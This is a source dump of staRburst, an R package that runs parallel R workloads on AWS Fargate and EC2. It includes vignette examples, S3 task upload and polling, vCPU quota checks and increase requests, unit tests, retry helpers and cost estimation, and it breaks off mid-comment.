#             nrow(challenged_stores)))
# if (nrow(challenged_stores) > 0) {
#   cat(sprintf("  Average market potential: $%.0f\n",
#               mean(challenged_stores$market_potential)))
#   cat(sprintf("  Average competitors nearby: %.1f\n",
#               mean(challenged_stores$competitors_within_5km)))
# }
# 
# # Top regions by market potential
# cat("\n=== Top 5 Regions by Market Potential ===\n")
# region_summary <- aggregate(market_potential ~ region_name,
#                            data = spatial_metrics, FUN = mean)
# region_summary <- region_summary[order(-region_summary$market_potential), ]
# for (i in 1:min(5, nrow(region_summary))) {
#   cat(sprintf("%d. %s: $%.0f\n", i,
#               region_summary$region_name[i],
#               region_summary$market_potential[i]))
# }

## ----zones, eval=FALSE--------------------------------------------------------
# optimize_delivery_zones <- function(region_id, stores_data, customers_data) {
#   region_stores <- stores_data[stores_data$region_id == region_id, ]
#   region_customers <- customers_data[customers_data$region_id == region_id, ]
# 
#   # Assign each customer to nearest store
#   customer_assignments <- lapply(1:nrow(region_customers), function(i) {
#     customer <- region_customers[i, ]
# 
#     distances <- sapply(1:nrow(region_stores), function(j) {
#       haversine_distance(
#         customer$latitude, customer$longitude,
#         region_stores$latitude[j], region_stores$longitude[j]
#       )
#     })
# 
#     nearest_store <- which.min(distances)
# 
#     list(
#       customer_id = customer$customer_id,
#       assigned_store = region_stores$store_id[nearest_store],
#       distance_km = distances[nearest_store],
#       annual_spend = customer$annual_spend
#     )
#   })
# 
#   # Aggregate by store
#   assignments_df <- do.call(rbind, lapply(customer_assignments, as.data.frame))
# 
#   store_zones <- aggregate(
#     cbind(customer_count = customer_id,
#           total_revenue = annual_spend,
#           avg_distance = distance_km) ~ assigned_store,
#     data = assignments_df,
#     FUN = function(x) if (is.numeric(x)) mean(x) else length(x)
#   )
# 
#   store_zones
# }
# 
# # Run optimization
# zone_results <- starburst_map(
#   regions$region_id,
#   optimize_delivery_zones,
#   stores_data = stores,
#   customers_data = customers,
#   workers = 20
# )

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/geospatial.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/geospatial.R", package = "starburst"))

#' S3 task/result I/O for staRburst
#'
#' Serialization of task payloads to S3, polling for results, and cleanup of
#' the per-cluster task objects.
#'
#' @name s3-io
#' @keywords internal
NULL

#' Get starburst bucket name
#'
#' @return S3 bucket name
#' @keywords internal
get_starburst_bucket <- function() {
  config <- get_starburst_config()
  config$bucket
}

#' Create task object
#'
#' @keywords internal
create_task <- function(expr, globals, packages, plan) {
  list(
    expr = expr,
    globals = globals,
    packages = packages,
    plan_info = list(
      cluster_id = plan$cluster_id,
      cpu = plan$cpu,
      memory = plan$memory,
      region = plan$region
    )
  )
}

#' Serialize and upload to S3
#'
#' @keywords internal
serialize_and_upload <- function(obj, bucket, key) {
  temp_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_file))

  qs2::qs_save(obj, temp_file)

  s3 <- get_s3_client(extract_region_from_key(key))
  s3$put_object(
    Bucket = bucket,
    Key = key,
    Body = temp_file
  )

  invisible(NULL)
}

#' Extract region from S3 key
#'
#' @keywords internal
extract_region_from_key <- function(key) {
  config <- get_starburst_config()
  config$region
}

#' Check if result exists
#'
#' @keywords internal
result_exists <- function(task_id, region) {
  bucket <- get_starburst_bucket()
  key <- sprintf("results/%s.qs", task_id)

  s3 <- get_s3_client(region)

  tryCatch({
    s3$head_object(Bucket = bucket, Key = key)
    return(TRUE)
  }, error = function(e) {
    return(FALSE)
  })
}

#' Poll for result
#'
#' @keywords internal
poll_for_result <- function(future, timeout = 3600) {
  bucket <- get_starburst_bucket()
  key <- sprintf("results/%s/%s.qs", future$plan$cluster_id, future$task_id)
  region <- future$plan$region

  s3 <- get_s3_client(region)

  start_time <- Sys.time()

  while (TRUE) {
    # Check if result exists
    if (result_exists(future$task_id, region)) {
      # Download and deserialize
      temp_file <- tempfile(fileext = ".qs")
      on.exit(unlink(temp_file))

      s3$download_file(
        Bucket = bucket,
        Key = key,
        Filename = temp_file
      )

      result <- qs2::qs_read(temp_file)
      return(result)
    }

    # Check timeout
    elapsed <- as.numeric(difftime(Sys.time(), start_time, units = "secs"))
    if (elapsed > timeout) {
      stop(sprintf("Task timeout after %d seconds", timeout))
    }

    # Wait before next poll
    Sys.sleep(2)
  }
}

#' Cleanup S3 files
#'
#' @keywords internal
cleanup_s3_files <- function(plan) {
  bucket <- get_starburst_bucket()
  prefix <- sprintf("tasks/%s/", plan$cluster_id)

  s3 <- get_s3_client(plan$region)

  tryCatch({
    # List and delete task files
    objects <- s3$list_objects_v2(Bucket = bucket, Prefix = prefix)

    if (length(objects$Contents) > 0) {
      delete_objects <- lapply(objects$Contents, function(obj) {
        list(Key = obj$Key)
      })

      s3$delete_objects(
        Bucket = bucket,
        Delete = list(Objects = delete_objects)
      )
    }
  }, error = function(e) {
    warning(sprintf("Error cleaning S3 files: %s", e$message))
  })

  invisible(NULL)
}

#' Check Fargate vCPU quota
#'
#' @param region AWS region
#' @return List with quota information
#' @keywords internal
check_fargate_quota <- function(region) {
  sq <- get_service_quotas_client(region)

  tryCatch({
    # Get current quota
    quota_response <- sq$get_service_quota(
      ServiceCode = "fargate",
      QuotaCode = "L-3032A538"  # Fargate vCPU quota code
    )

    current_limit <- quota_response$Quota$Value

    # Check for pending increase requests
    pending_response <- sq$list_requested_service_quota_change_history_by_quota(
      ServiceCode = "fargate",
      QuotaCode = "L-3032A538",
      Status = "PENDING"
    )

    has_pending <- length(pending_response$RequestedQuotas) > 0

    # Get current usage (approximate from CloudWatch)
    current_usage <- get_current_vcpu_usage(region)

    list(
      limit = current_limit,
      used = current_usage,
      available = current_limit - current_usage,
      increase_pending = has_pending,
      pending_requests = pending_response$RequestedQuotas
    )

  }, error = function(e) {
    # Fallback if Service Quotas API not available
    warning(sprintf("Could not check quota: %s", e$message))
    list(
      limit = 100,  # Conservative default
      used = 0,
      available = 100,
      increase_pending = FALSE,
      pending_requests = list()
    )
  })
}

#' Request quota increase
#'
#' @param service AWS service (e.g., "fargate")
#' @param quota_code Service quota code
#' @param desired_value Desired quota value
#' @param region AWS region
#' @param reason Justification for increase
#'
#' @return Case ID if successful, NULL if failed
#' @keywords internal
request_quota_increase <- function(service,
                                   quota_code,
                                   desired_value,
                                   region,
                                   reason = "") {
  sq <- get_service_quotas_client(region)

  tryCatch({
    response <- sq$request_service_quota_increase(
      ServiceCode = service,
      QuotaCode = quota_code,
      DesiredValue = desired_value
    )

    case_id <- response$RequestedQuota$CaseId

    # Save request to local tracking
    save_quota_request(case_id, service, quota_code, desired_value, region)

    return(case_id)

  }, error = function(e) {
    cat_error(sprintf("Failed to request quota increase: %s\n", e$message))
    cat_info("\nPlease request manually:\n")
    cat_info(sprintf(
      "  https://console.aws.amazon.com/servicequotas/home/services/%s/quotas/%s\n",
      service, quota_code
    ))
    return(NULL)
  })
}

#' Request quota increase (user-facing)
#'
#' @param vcpus Desired vCPU quota
#' @param region AWS region (default: from config)
#'
#' @return Invisibly returns \code{TRUE} if the increase was requested,
#'   \code{FALSE} if already sufficient or cancelled.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   starburst_request_quota_increase(vcpus = 500)
#' }
#' }
starburst_request_quota_increase <- function(vcpus = 500, region = NULL) {

  config <- get_starburst_config()
  region <- region %||% config$region

  # Check current quota
  quota_info <- check_fargate_quota(region)

  if (vcpus <= quota_info$limit) {
    cat_info(sprintf(
      "Current quota (%d vCPUs) already meets or exceeds requested (%d vCPUs)\n",
      quota_info$limit, vcpus
    ))
    return(invisible(FALSE))
  }

  if (quota_info$increase_pending) {
    cat_warn("You already have a pending quota increase request\n")

    if (length(quota_info$pending_requests) > 0) {
      for (req in quota_info$pending_requests) {
        cat_info(sprintf(
          "  Case ID: %s, Requested: %.0f vCPUs\n",
          req$CaseId, req$DesiredValue
        ))
      }
    }

    return(invisible(FALSE))
  }

  cat_info(sprintf("Requesting Fargate vCPU quota increase:\n"))
  cat_info(sprintf("  Current: %d vCPUs\n", quota_info$limit))
  cat_info(sprintf("  Requested: %d vCPUs\n", vcpus))
  cat_info(sprintf("  Region: %s\n", region))

  if (interactive()) {
    response <- readline("\nProceed? [y/n]: ")
    if (tolower(response) != "y") {
      cat_info("Request cancelled\n")
      return(invisible(FALSE))
    }
  }

  case_id <- request_quota_increase(
    service = "fargate",
    quota_code = "L-3032A538",
    desired_value = vcpus,
    region = region,
    reason = sprintf("staRburst parallel R computing - need %d vCPUs for workloads", vcpus)
  )

  if (!is.null(case_id)) {
    cat_success(sprintf("\n[OK] Quota increase requested (Case ID: %s)\n", case_id))
    cat_success("[OK] AWS typically approves these requests within 1-24 hours\n")
    cat_success("[OK] You'll receive an email when the request is processed\n")
    cat_info("\nCheck status: starburst_quota_status()\n")
    return(invisible(TRUE))
  }

  invisible(FALSE)
}

#' Show quota status
#'
#' @param region AWS region (default: from config)
#'
#' @return Invisibly returns a list with quota information including current
#'   limit, usage, and any pending requests.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   starburst_quota_status()
#' }
#' }
starburst_quota_status <- function(region = NULL) {

  config <- get_starburst_config()
  region <- region %||% config$region

  cat_header("Fargate vCPU Quota Status\n")

  quota_info <- check_fargate_quota(region)

  cat_info(sprintf("Region: %s\n\n", region))
  cat_info(sprintf("Current Quota: %d vCPUs\n", quota_info$limit))
  cat_info(sprintf("Currently Used: %d vCPUs\n", quota_info$used))
  cat_info(sprintf("Available: %d vCPUs\n", quota_info$available))

  # Show what this allows
  workers_4cpu <- floor(quota_info$available / 4)
  workers_8cpu <- floor(quota_info$available / 8)

  cat_info(sprintf("\nCapacity:\n"))
  cat_info(sprintf("  * ~%d workers with 4 vCPUs each\n", workers_4cpu))
  cat_info(sprintf("  * ~%d workers with 8 vCPUs each\n", workers_8cpu))

  # Pending requests
  if (quota_info$increase_pending) {
    cat_warn("\nPending Quota Increase Requests:\n")
    for (req in quota_info$pending_requests) {
      cat_info(sprintf(
        "  * Case ID: %s\n    Requested: %.0f vCPUs\n    Status: %s\n    Created: %s\n",
        req$CaseId,
        req$DesiredValue,
        req$Status,
        format(req$Created, "%Y-%m-%d %H:%M")
      ))
    }
  }

  # Recommendations
  if (quota_info$limit < 500) {
    cat_warn("\n[TIP] Recommendation:\n")
    cat_info("  For typical parallel workloads, we recommend 500+ vCPUs\n")
    cat_info("  Request increase: starburst_request_quota_increase(vcpus = 500)\n")
  } else {
    cat_success("\n[OK] Quota is sufficient for most workloads\n")
  }

  # Show historical requests
  history <- load_quota_history()
  if (length(history) > 0) {
    cat_info("\nRecent Requests:\n")
    for (h in utils::tail(history, 5)) {
      cat_info(sprintf(
        "  * %s: Requested %d vCPUs (Case: %s)\n",
        format(h$timestamp, "%Y-%m-%d"),
        h$desired_value,
        h$case_id
      ))
    }
  }

  invisible(quota_info)
}

#' Suggest appropriate quota based on needs
#'
#' @param vcpus_needed vCPUs needed
#' @return Suggested quota value
#' @keywords internal
suggest_quota <- function(vcpus_needed) {
  # Round up to standard increments
  # AWS prefers requests at these levels

  quotas <- c(100, 200, 500, 1000, 2000, 5000, 10000)

  # Find smallest quota that's >= needed + 25% buffer
  needed_with_buffer <- vcpus_needed * 1.25

  for (quota in quotas) {
    if (quota >= needed_with_buffer) {
      return(quota)
    }
  }

  # If we get here, they need more than 10k
  ceiling(needed_with_buffer / 1000) * 1000
}

#' Get current vCPU usage
#'
#' @keywords internal
get_current_vcpu_usage <- function(region) {
  ecs <- get_ecs_client(region)

  tryCatch({
    # List all clusters
    clusters_response <- ecs$list_clusters()

    if (length(clusters_response$clusterArns) == 0) {
      return(0)
    }

    # Get running tasks for each cluster
    total_vcpus <- 0

    for (cluster_arn in clusters_response$clusterArns) {
      tasks_response <- ecs$list_tasks(
        cluster = cluster_arn,
        desiredStatus = "RUNNING",
        launchType = "FARGATE"
      )

      if (length(tasks_response$taskArns) == 0) {
        next
      }

      # Describe tasks to get CPU allocation
      tasks_detail <- ecs$describe_tasks(
        cluster = cluster_arn,
        tasks = tasks_response$taskArns
      )

      for (task in tasks_detail$tasks) {
        # Parse CPU from task definition
        # CPU is in units (1024 = 1 vCPU)
        cpu_units <- as.numeric(task$cpu)
        vcpus <- cpu_units / 1024
        total_vcpus <- total_vcpus + vcpus
      }
    }

    return(total_vcpus)

  }, error = function(e) {
    # If we can't get usage, return 0
    return(0)
  })
}

#' Save quota request to local history
#'
#' @keywords internal
save_quota_request <- function(case_id, service, quota_code, desired_value, region) {
  history_file <- file.path(config_dir(), "quota_history.rds")

  # Load existing history
  if (file.exists(history_file)) {
    history <- readRDS(history_file)
  } else {
    history <- list()
  }

  # Add new request
  request <- list(
    case_id = case_id,
    service = service,
    quota_code = quota_code,
    desired_value = desired_value,
    region = region,
    timestamp = Sys.time()
  )

  history <- c(history, list(request))

  # Save
  saveRDS(history, history_file)

  invisible(NULL)
}

#' Load quota request history
#'
#' @keywords internal
load_quota_history <- function() {
  history_file <- file.path(config_dir(), "quota_history.rds")

  if (!file.exists(history_file)) {
    return(list())
  }

  readRDS(history_file)
}

#' Check if quota is sufficient for plan
#'
#' @keywords internal
check_quota_sufficient <- function(workers, cpu, region) {
  quota_info <- check_fargate_quota(region)
  needed <- workers * cpu

  list(
    sufficient = needed <= quota_info$available,
    needed = needed,
    available = quota_info$available,
    workers_per_wave = floor(quota_info$available / cpu),
    num_waves = ceiling(workers / floor(quota_info$available / cpu))
  )
}

#' Monitor quota increase request
#'
#' @param case_id Case ID from quota increase request
#' @param region AWS region
#'
#' @return Invisibly returns the quota request details, or \code{NULL} on error.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   starburst_check_quota_request("case-12345")
#' }
#' }
starburst_check_quota_request <- function(case_id, region = NULL) {
  config <- get_starburst_config()
  region <- region %||% config$region

  sq <- get_service_quotas_client(region)

  tryCatch({
    response <- sq$get_requested_service_quota_change(
      RequestId = case_id
    )

    req <- response$RequestedQuota

    cat_info(sprintf("Quota Increase Request: %s\n\n", case_id))
    cat_info(sprintf("Service: %s\n", req$ServiceCode))
    cat_info(sprintf("Status: %s\n", req$Status))
    cat_info(sprintf("Requested Value: %.0f\n", req$DesiredValue))
    cat_info(sprintf("Created: %s\n", format(req$Created, "%Y-%m-%d %H:%M")))

    if (!is.null(req$LastUpdated)) {
      cat_info(sprintf("Last Updated: %s\n", format(req$LastUpdated, "%Y-%m-%d %H:%M")))
    }

    if (req$Status == "APPROVED") {
      cat_success("\n[OK] Request approved!\n")
      cat_info("Your new quota is now active\n")
    } else if (req$Status == "DENIED") {
      cat_error("\n[ERROR] Request denied\n")
      if (!is.null(req$DenialReason)) {
        cat_info(sprintf("Reason: %s\n", req$DenialReason))
      }
    } else if (req$Status == "PENDING") {
      cat_warn("\n[Wait] Request still pending\n")
      cat_info("AWS typically processes these within 1-24 hours\n")
    }

    invisible(req)

  }, error = function(e) {
    cat_error(sprintf("Failed to check request status: %s\n", e$message))
    invisible(NULL)
  })
}

test_that("suggest_quota rounds up appropriately", {
  expect_equal(suggest_quota(50), 100)
  expect_equal(suggest_quota(150), 200)
  expect_equal(suggest_quota(300), 500)
  expect_equal(suggest_quota(800), 1000)
  expect_equal(suggest_quota(1500), 2000)
})

test_that("suggest_quota adds buffer", {
  # 400 vCPUs needed = 500 with 25% buffer
  expect_equal(suggest_quota(400), 500)

  # 480 vCPUs needed = 600 with buffer, rounds to 1000
  expect_equal(suggest_quota(480), 1000)
})

test_that("parse_memory handles different formats", {
  expect_equal(parse_memory("8GB"), 8)
  expect_equal(parse_memory("16GB"), 16)
  expect_equal(parse_memory("1024MB"), 1)
  expect_equal(parse_memory("2048MB"), 2)
  expect_equal(parse_memory(8), 8)
})

test_that("parse_memory errors on invalid input", {
  expect_error(parse_memory("invalid"))
  expect_error(parse_memory("8"))
})

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(ggplot2)

## ----simulation, eval=FALSE---------------------------------------------------
# simulate_portfolio <- function(seed) {
#   set.seed(seed)
# 
#   # Portfolio parameters
#   n_days <- 252
#   initial_value <- 1000000  # $1M portfolio
# 
#   # Asset allocation (60/40 stocks/bonds)
#   stock_weight <- 0.6
#   bond_weight <- 0.4
# 
#   # Expected returns (annualized)
#   stock_return <- 0.10 / 252  # 10% annual
#   bond_return <- 0.04 / 252   # 4% annual
# 
#   # Volatility (annualized)
#   stock_vol <- 0.20 / sqrt(252)  # 20% annual
#   bond_vol <- 0.05 / sqrt(252)   # 5% annual
# 
#   # Correlation
#   correlation <- 0.3
# 
#   # Generate correlated returns
#   stock_returns <- rnorm(n_days, mean = stock_return, sd = stock_vol)
#   bond_noise <- rnorm(n_days)
#   bond_returns <- rnorm(n_days, mean = bond_return, sd = bond_vol)
#   bond_returns <- correlation * stock_returns +
#                   sqrt(1 - correlation^2) * bond_returns
# 
#   # Portfolio returns
#   portfolio_returns <- stock_weight * stock_returns +
#                       bond_weight * bond_returns
# 
#   # Cumulative value
#   portfolio_values <- initial_value * cumprod(1 + portfolio_returns)
# 
#   # Calculate metrics
#   final_value <- portfolio_values[n_days]
#   max_drawdown <- max((cummax(portfolio_values) - portfolio_values) /
#                       cummax(portfolio_values))
#   sharpe_ratio <- mean(portfolio_returns) / sd(portfolio_returns) * sqrt(252)
# 
#   list(
#     final_value = final_value,
#     return_pct = (final_value - initial_value) / initial_value * 100,
#     max_drawdown = max_drawdown,
#     sharpe_ratio = sharpe_ratio,
#     min_value = min(portfolio_values),
#     max_value = max(portfolio_values)
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 100 simulations
# set.seed(123)
# local_start <- Sys.time()
# local_results <- lapply(1:100, simulate_portfolio)
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("100 simulations completed in %.1f seconds\n", local_time))
# cat(sprintf("Estimated time for 10,000: %.1f minutes\n",
#             local_time * 100 / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # 100 tasks x 100 simulations = 10,000 simulations, batched
# batches <- split(1:10000, ceiling(seq_along(1:10000) / 100))
# results <- starburst_map(
#   batches,
#   function(seeds) lapply(seeds, simulate_portfolio),
#   workers = 50,
#   cpu = 2,
#   memory = "4GB"
# )
# results <- unlist(results, recursive = FALSE)  # flatten to 10,000 results

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract metrics
# final_values <- sapply(results, function(x) x$final_value)
# returns <- sapply(results, function(x) x$return_pct)
# sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)
# max_drawdowns <- sapply(results, function(x) x$max_drawdown)
# 
# # Summary statistics
# cat("\n=== Portfolio Simulation Results (10,000 scenarios) ===\n")
# cat(sprintf("Mean final value: $%.0f\n", mean(final_values)))
# cat(sprintf("Median final value: $%.0f\n", median(final_values)))
# cat(sprintf("\nMean return: %.2f%%\n", mean(returns)))
# cat(sprintf("Std dev of returns: %.2f%%\n", sd(returns)))
# cat(sprintf("\nValue at Risk (5%%): $%.0f\n",
#             quantile(final_values, 0.05)))
# cat(sprintf("Expected Shortfall (5%%): $%.0f\n",
#             mean(final_values[final_values <= quantile(final_values, 0.05)])))
# cat(sprintf("\nMean Sharpe Ratio: %.2f\n", mean(sharpe_ratios)))
# cat(sprintf("Mean Max Drawdown: %.2f%%\n", mean(max_drawdowns) * 100))
# cat(sprintf("\nProbability of loss: %.2f%%\n",
#             mean(returns < 0) * 100))
# 
# # Distribution plot
# hist(final_values / 1000,
#      breaks = 50,
#      main = "Distribution of Portfolio Final Values",
#      xlab = "Final Value ($1000s)",
#      col = "lightblue",
#      border = "white")
# abline(v = 1000, col = "red", lwd = 2, lty = 2)
# abline(v = quantile(final_values / 1000, 0.05), col = "orange", lwd = 2, lty = 2)
# legend("topright",
#        c("Initial Value", "VaR (5%)"),
#        col = c("red", "orange"),
#        lwd = 2, lty = 2)

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/monte-carlo.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/monte-carlo.R", package = "starburst"))

#' AWS service clients and credential helpers for staRburst
#'
#' @name aws-clients
#' @keywords internal
NULL

#' Check AWS credentials
#'
#' @return Logical indicating if credentials are valid
#' @keywords internal
check_aws_credentials <- function() {
  tryCatch({
    sts <- paws.security.identity::sts()
    identity <- sts$get_caller_identity()
    return(TRUE)
  }, error = function(e) {
    return(FALSE)
  })
}

#' Get AWS account ID
#'
#' @return AWS account ID
#' @keywords internal
get_aws_account_id <- function() {
  sts <- paws.security.identity::sts()
  identity <- sts$get_caller_identity()
  identity$Account
}

#' Get S3 client
#'
#' @param region AWS region
#' @return S3 client
#' @keywords internal
get_s3_client <- function(region) {
  paws.storage::s3(config = list(region = region))
}

#' Get ECS client
#'
#' @param region AWS region
#' @return ECS client
#' @keywords internal
get_ecs_client <- function(region) {
  paws.compute::ecs(config = list(region = region))
}

#' Get ECR client
#'
#' @param region AWS region
#' @return ECR client
#' @keywords internal
get_ecr_client <- function(region) {
  paws.compute::ecr(config = list(region = region))
}

#' Get EC2 client
#'
#' @param region AWS region
#' @return EC2 client
#' @keywords internal
get_ec2_client <- function(region) {
  paws.compute::ec2(config = list(region = region))
}

#' Get Service Quotas client
#'
#' @param region AWS region
#' @return Service Quotas client
#' @keywords internal
get_service_quotas_client <- function(region) {
  paws.management::servicequotas(config = list(region = region))
}

#' View worker logs
#'
#' @param task_id Optional task ID to view logs for specific task
#' @param cluster_id Optional cluster ID to view logs for specific cluster
#' @param last_n Number of last log lines to show (default: 50)
#' @param region AWS region (default: from config)
#'
#' @return Invisibly returns the list of log events, or \code{NULL} if no
#'   events were found.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   # View recent logs
#'   starburst_logs()
#'
#'   # View logs for specific task
#'   starburst_logs(task_id = "abc-123")
#'
#'   # View last 100 lines
#'   starburst_logs(last_n = 100)
#' }
#' }
starburst_logs <- function(task_id = NULL,
                          cluster_id = NULL,
                          last_n = 50,
                          region = NULL) {

  config <- get_starburst_config()
  region <- region %||% config$region

  logs <- paws.management::cloudwatchlogs(config = list(region = region))

  # Determine log group and stream
  log_group <- "/aws/ecs/starburst-worker"

  if (!is.null(task_id)) {
    # Get logs for specific task
    log_stream <- sprintf("starburst/%s", task_id)
  } else if (!is.null(cluster_id)) {
    # Get logs for cluster
    log_stream <- sprintf("starburst-cluster/%s", cluster_id)
  } else {
    # Get most recent logs
    streams <- logs$describe_log_streams(
      logGroupName = log_group,
      orderBy = "LastEventTime",
      descending = TRUE,
      limit = 1
    )

    if (length(streams$logStreams) == 0) {
      message("No logs found")
      return(invisible(NULL))
    }

    log_stream <- streams$logStreams[[1]]$logStreamName
  }

  tryCatch({
    # Get log events
    events <- logs$get_log_events(
      logGroupName = log_group,
      logStreamName = log_stream,
      limit = last_n,
      startFromHead = FALSE
    )

    if (length(events$events) == 0) {
      message("No log events found")
      return(invisible(NULL))
    }

    # Print logs
    cat_header(sprintf("Logs: %s\n", log_stream))

    for (event in events$events) {
      timestamp <- format(
        as.POSIXct(event$timestamp / 1000, origin = "1970-01-01"),
        "%Y-%m-%d %H:%M:%S"
      )
      cat(sprintf("[%s] %s\n", timestamp, event$message))
    }

    invisible(events$events)

  }, error = function(e) {
    cat_error(sprintf("Error retrieving logs: %s\n", e$message))
    invisible(NULL)
  })
}

#' Rebuild environment image
#'
#' @param region AWS region (default: from config)
#' @param force Force rebuild even if current environment hasn't changed
#'
#' @return Invisibly returns \code{NULL}. Called for its side effect of
#'   rebuilding and pushing the Docker environment image.
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   starburst_rebuild_environment()
#' }
#' }
starburst_rebuild_environment <- function(region = NULL, force = FALSE) {
  config <- get_starburst_config()
  region <- region %||% config$region

  cat_info("Rebuilding R environment Docker image...\n")

  if (force) {
    cat_info("Force rebuild requested\n")
  }

  # Use existing renv.lock (do not auto-snapshot to avoid including dev packages)
  lock_file <- renv::paths$lockfile()
  env_hash <- compute_env_hash(lock_file)

  # Build image
  build_environment_image(env_hash, region)

  cat_success(sprintf("[OK] Environment rebuilt (hash: %s)\n", env_hash))

  invisible(env_hash)
}

#' AWS Retry Logic
#'
#' Centralized retry logic for AWS operations with exponential backoff
#'
#' @name aws-retry
#' @keywords internal
NULL

#' Retry AWS operations with exponential backoff
#'
#' Wraps AWS API calls with automatic retry logic for transient failures.
#' Uses exponential backoff with jitter to avoid thundering herd.
#'
#' @param expr Expression to evaluate (AWS API call)
#' @param max_attempts Maximum retry attempts (default: 3)
#' @param base_delay Initial delay in seconds (default: 1)
#' @param max_delay Maximum delay in seconds (default: 60)
#' @param retryable_errors Regex patterns for retryable error messages
#' @param operation_name Optional name for logging (default: "AWS operation")
#'
#' @return Result of expression
#' @keywords internal
with_aws_retry <- function(expr,
                          max_attempts = 3,
                          base_delay = 1,
                          max_delay = 60,
                          retryable_errors = c(
                            "Throttling",
                            "ThrottlingException",
                            "RequestTimeout",
                            "ServiceUnavailable",
                            "InternalError",
                            "InternalServerError",
                            "TooManyRequests",
                            "RequestLimitExceeded",
                            "5\\d{2}"  # 5xx HTTP errors
                          ),
                          operation_name = "AWS operation") {

  last_error <- NULL

  for (attempt in seq_len(max_attempts)) {
    tryCatch({
      # Execute expression
      return(force(expr))  # Success - return immediately

    }, error = function(e) {
      last_error <<- e

      # Check if error is retryable
      is_retryable <- any(vapply(retryable_errors, function(pattern) {
        grepl(pattern, e$message, ignore.case = TRUE)
      }, FUN.VALUE = logical(1)))

      if (!is_retryable) {
        # Not retryable - fail immediately
        stop(e)
      }

      if (attempt >= max_attempts) {
        # Exhausted retries - fail
        stop(e)
      }

      # Calculate exponential backoff with jitter
      # delay = base_delay * (2 ^ (attempt - 1)) + random jitter
      exponential_delay <- base_delay * (2 ^ (attempt - 1))
      capped_delay <- min(exponential_delay, max_delay)
      jitter <- runif(1, 0, capped_delay * 0.1)  # 10% jitter
      total_delay <- capped_delay + jitter

      cat_warn(sprintf(
        "[WARNING] %s failed (attempt %d/%d): %s\n  Retrying in %.1fs...\n",
        operation_name, attempt, max_attempts,
        substring(e$message, 1, 100),  # Truncate long messages
        total_delay
      ))

      Sys.sleep(total_delay)

      NULL  # Continue to next iteration
    })
  }

  # Should never reach here, but if we do, throw last error
  stop(last_error)
}

#' Retry S3 operations
#'
#' Specialized wrapper for S3 operations with S3-specific retry patterns
#'
#' @inheritParams with_aws_retry
#' @keywords internal
with_s3_retry <- function(expr, max_attempts = 3, operation_name = "S3 operation") {
  with_aws_retry(
    expr,
    max_attempts = max_attempts,
    retryable_errors = c(
      "Throttling",
      "RequestTimeout",
      "ServiceUnavailable",
      "SlowDown",
      "5\\d{2}"
    ),
    operation_name = operation_name
  )
}

#' Retry ECS operations
#'
#' Specialized wrapper for ECS operations with ECS-specific retry patterns
#'
#' @inheritParams with_aws_retry
#' @keywords internal
with_ecs_retry <- function(expr, max_attempts = 3, operation_name = "ECS operation") {
  with_aws_retry(
    expr,
    max_attempts = max_attempts,
    retryable_errors = c(
      "Throttling",
      "RequestTimeout",
      "ServiceUnavailable",
      "ServerException",
      "ClusterNotFoundException",  # Sometimes transient during cluster creation
      "5\\d{2}"
    ),
    operation_name = operation_name
  )
}

#' Retry ECR operations
#'
#' Specialized wrapper for ECR operations with ECR-specific retry patterns
#'
#' @inheritParams with_aws_retry
#' @keywords internal
with_ecr_retry <- function(expr, max_attempts = 3, operation_name = "ECR operation") {
  with_aws_retry(
    expr,
    max_attempts = max_attempts,
    retryable_errors = c(
      "Throttling",
      "TooManyRequests",
      "RequestTimeout",
      "ServiceUnavailable",
      "5\\d{2}"
    ),
    operation_name = operation_name
  )
}

#' Cost estimation and pricing for staRburst
#'
#' @name cost
#' @keywords internal
NULL

#' Estimate cost
#'
#' @keywords internal
estimate_cost <- function(workers, cpu, memory, estimated_runtime_hours = 1,
                         launch_type = "FARGATE", instance_type = NULL, use_spot = FALSE) {

  if (launch_type == "FARGATE") {
    # Fargate pricing (us-east-1, 2026)
    vcpu_price_per_hour <- 0.04048
    gb_price_per_hour <- 0.004445

    memory_gb <- parse_memory(memory)

    cost_per_worker_per_hour <-
      (cpu * vcpu_price_per_hour) +
      (memory_gb * gb_price_per_hour)

    per_hour <- cost_per_worker_per_hour * workers
    list(
      # hourly_rate is the NORMALIZED field every consumer should use — the total
      # $/hour for the whole job, regardless of backend. (per_hour/per_worker kept
      # for back-compat.)
      hourly_rate = per_hour,
      per_worker = cost_per_worker_per_hour,
      per_hour = per_hour,
      total_estimated = per_hour * estimated_runtime_hours,
      backend = "FARGATE",
      instance_type = NULL,
      use_spot = FALSE
    )
  } else {
    # EC2 pricing
    instance_price <- get_ec2_instance_price(instance_type, use_spot)
    instance_vcpus <- get_instance_vcpus(instance_type)

    # Calculate number of instances needed
    total_vcpus_needed <- workers * cpu
    instances_needed <- ceiling(total_vcpus_needed / instance_vcpus)

    total_cost_per_hour <- instances_needed * instance_price

    list(
      hourly_rate = total_cost_per_hour,   # normalized total $/hour (see above)
      per_instance = instance_price,
      instances_needed = instances_needed,
      total_per_hour = total_cost_per_hour,
      total_estimated = total_cost_per_hour * estimated_runtime_hours,
      spot_discount = if (use_spot) "~70%" else "N/A",
      backend = "EC2",
      instance_type = instance_type,
      use_spot = use_spot,
      launch_type = "EC2"
    )
  }
}

# Session cache for live price lookups, keyed by "instance_type|region|spot".
.price_cache <- new.env(parent = emptyenv())

#' Built-in fallback EC2 On-Demand prices (us-east-1, Linux, per hour).
#'
#' Used when the live AWS Pricing API can't be reached (offline, missing perms,
